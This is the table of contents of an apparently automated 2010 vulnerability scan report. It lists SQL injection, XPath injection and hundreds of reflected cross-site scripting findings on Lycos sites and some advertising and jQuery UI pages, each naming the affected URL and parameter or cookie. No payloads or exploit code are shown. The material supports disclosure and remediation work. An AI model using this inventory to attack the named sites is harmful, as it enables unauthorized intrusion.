lycos.com, XSS, CWE-79, CAPEC-86, Vulnerability Report

Loading
s

Cross Site Scripting in lycos.com web properties

Report generated by XSS.CX at Sun Dec 12 09:18:36 CST 2010.


Contents

1. SQL injection

1.1. http://deals.lycos.com/deals/stores/6pm-1460 [REST URL parameter 3]

1.2. http://deals.lycos.com/deals/stores/best-buy-560 [REST URL parameter 3]

1.3. http://deals.lycos.com/deals/stores/buy-com-233 [REST URL parameter 3]

1.4. http://deals.lycos.com/deals/stores/dell-home-638 [REST URL parameter 3]

1.5. http://deals.lycos.com/deals/stores/ebay-50 [REST URL parameter 3]

1.6. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [REST URL parameter 3]

1.7. http://deals.lycos.com/deals/stores/jcpenney-320 [REST URL parameter 3]

1.8. http://deals.lycos.com/deals/stores/kohls-1009 [REST URL parameter 3]

1.9. http://deals.lycos.com/deals/stores/sony-style-716 [REST URL parameter 3]

1.10. http://deals.lycos.com/deals/stores/walmart-321 [REST URL parameter 3]

1.11. http://www.gamesville.com/cash/ [name of an arbitrarily supplied request parameter]

2. XPath injection

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]

3.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]

3.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]

3.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]

3.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]

3.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]

3.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]

3.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]

3.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]

3.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]

3.13. http://advertising.lycos.com/ [cat parameter]

3.14. http://advertising.lycos.com/ [tab parameter]

3.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]

3.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]

3.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]

3.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]

3.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]

3.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]

3.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]

3.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]

3.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

3.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

3.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

3.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

3.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

3.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]

3.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

3.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

3.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

3.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

3.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

3.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

3.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]

3.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

3.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

3.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

3.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

3.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

3.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

3.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

3.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

3.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

3.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]

3.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

3.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]

3.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

3.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]

3.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

3.51. http://ib.adnxs.com/ptj [redir parameter]

3.52. http://info.lycos.com/ [cat parameter]

3.53. http://info.lycos.com/ [tab parameter]

3.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

3.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

3.56. http://jobs.lycos.com/search [x parameter]

3.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.60. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.87. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.93. http://jqueryui.com/themeroller/ [fcActive parameter]

3.94. http://jqueryui.com/themeroller/ [fcContent parameter]

3.95. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.96. http://jqueryui.com/themeroller/ [fcError parameter]

3.97. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.99. http://jqueryui.com/themeroller/ [fcHover parameter]

3.100. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.101. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.102. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.106. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]

3.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]

3.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

3.119. http://peoplesearch.lycos.com/ [search-type parameter]

3.120. http://peoplesearch.lycos.com/ [tab parameter]

3.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

3.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

3.123. http://search.lycos.com/ [cat parameter]

3.124. http://search.lycos.com/ [cat parameter]

3.125. http://search.lycos.com/ [mobile parameter]

3.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

3.127. http://search.lycos.com/ [query parameter]

3.128. http://search.lycos.com/ [query parameter]

3.129. http://search.lycos.com/ [src parameter]

3.130. http://search.lycos.com/ [tab parameter]

3.131. http://search.lycos.com/ [x parameter]

3.132. http://search.lycos.com/ [y parameter]

3.133. http://search.lycos.com/image/ [cat parameter]

3.134. http://search.lycos.com/image/ [cat parameter]

3.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

3.136. http://search.lycos.com/image/ [tab parameter]

3.137. http://search.lycos.com/video/ [cat parameter]

3.138. http://search.lycos.com/video/ [cat parameter]

3.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

3.140. http://search.lycos.com/video/ [tab parameter]

3.141. http://advertising.lycos.com/ [diktfc cookie]

3.142. http://advertising.lycos.com/ [diktfc cookie]

3.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

3.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

3.145. http://advertising.lycos.com/contactus.html [diktfc cookie]

3.146. http://advertising.lycos.com/contactus.html [diktfc cookie]

3.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]

3.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]

3.149. http://deals.lycos.com/ [diktfc cookie]

3.150. http://deals.lycos.com/ [diktfc cookie]

3.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]

3.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]

3.153. http://deals.lycos.com/coupons [diktfc cookie]

3.154. http://deals.lycos.com/coupons [diktfc cookie]

3.155. http://deals.lycos.com/coupons/stores [diktfc cookie]

3.156. http://deals.lycos.com/coupons/stores [diktfc cookie]

3.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

3.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

3.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

3.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

3.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

3.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

3.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

3.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

3.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

3.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

3.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

3.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

3.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

3.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

3.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

3.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

3.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

3.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

3.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

3.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

3.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

3.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

3.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

3.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

3.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

3.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

3.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

3.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

3.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

3.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

3.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

3.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

3.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

3.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

3.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

3.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

3.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

3.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

3.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

3.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

3.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

3.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

3.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

3.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

3.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

3.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

3.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

3.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

3.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

3.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

3.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

3.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

3.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

3.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

3.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

3.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

3.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

3.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

3.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

3.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

3.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

3.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

3.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

3.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

3.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

3.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

3.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

3.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

3.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

3.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

3.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

3.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

3.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

3.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

3.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

3.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

3.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

3.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

3.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

3.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

3.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

3.238. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

3.239. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

3.240. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

3.241. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

3.242. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

3.243. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

3.244. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

3.245. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

3.246. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

3.247. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

3.248. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

3.249. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

3.250. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

3.251. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

3.252. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

3.253. http://deals.lycos.com/deals [diktfc cookie]

3.254. http://deals.lycos.com/deals [diktfc cookie]

3.255. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

3.256. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

3.257. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

3.258. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

3.259. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

3.260. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

3.261. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

3.262. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

3.263. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

3.264. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

3.265. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

3.266. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

3.267. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

3.268. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

3.269. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

3.270. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

3.271. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

3.272. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

3.273. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

3.274. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

3.275. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

3.276. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

3.277. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

3.278. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

3.279. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

3.280. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

3.281. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

3.282. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

3.283. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

3.284. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

3.285. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

3.286. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

3.287. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

3.288. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

3.289. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

3.290. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

3.291. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

3.292. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

3.293. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

3.294. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

3.295. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

3.296. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

3.297. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

3.298. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

3.299. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

3.300. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

3.301. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

3.302. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

3.303. http://deals.lycos.com/deals/stores [diktfc cookie]

3.304. http://deals.lycos.com/deals/stores [diktfc cookie]

3.305. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

3.306. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

3.307. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

3.308. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

3.309. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

3.310. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

3.311. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

3.312. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

3.313. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

3.314. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

3.315. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

3.316. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

3.317. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

3.318. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

3.319. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

3.320. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

3.321. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

3.322. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

3.323. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

3.324. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

3.325. http://deals.lycos.com/search [diktfc cookie]

3.326. http://deals.lycos.com/search [diktfc cookie]

3.327. http://deals.lycos.com/sitemap [diktfc cookie]

3.328. http://deals.lycos.com/sitemap [diktfc cookie]

3.329. http://info.lycos.com/ [diktfc cookie]

3.330. http://info.lycos.com/ [diktfc cookie]

3.331. http://info.lycos.com/bootstrap.js [diktfc cookie]

3.332. http://info.lycos.com/bootstrap.js [diktfc cookie]

3.333. http://info.lycos.com/contact.php [diktfc cookie]

3.334. http://info.lycos.com/contact.php [diktfc cookie]

3.335. http://info.lycos.com/copyright.php [diktfc cookie]

3.336. http://info.lycos.com/copyright.php [diktfc cookie]

3.337. http://info.lycos.com/jobs.php [diktfc cookie]

3.338. http://info.lycos.com/jobs.php [diktfc cookie]

3.339. http://info.lycos.com/legal/legal.asp [diktfc cookie]

3.340. http://info.lycos.com/legal/legal.asp [diktfc cookie]

3.341. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

3.342. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

3.343. http://info.lycos.com/life.php [diktfc cookie]

3.344. http://info.lycos.com/life.php [diktfc cookie]

3.345. http://info.lycos.com/overview.php [diktfc cookie]

3.346. http://info.lycos.com/overview.php [diktfc cookie]

3.347. http://info.lycos.com/privacy.php [diktfc cookie]

3.348. http://info.lycos.com/privacy.php [diktfc cookie]

3.349. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

3.350. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

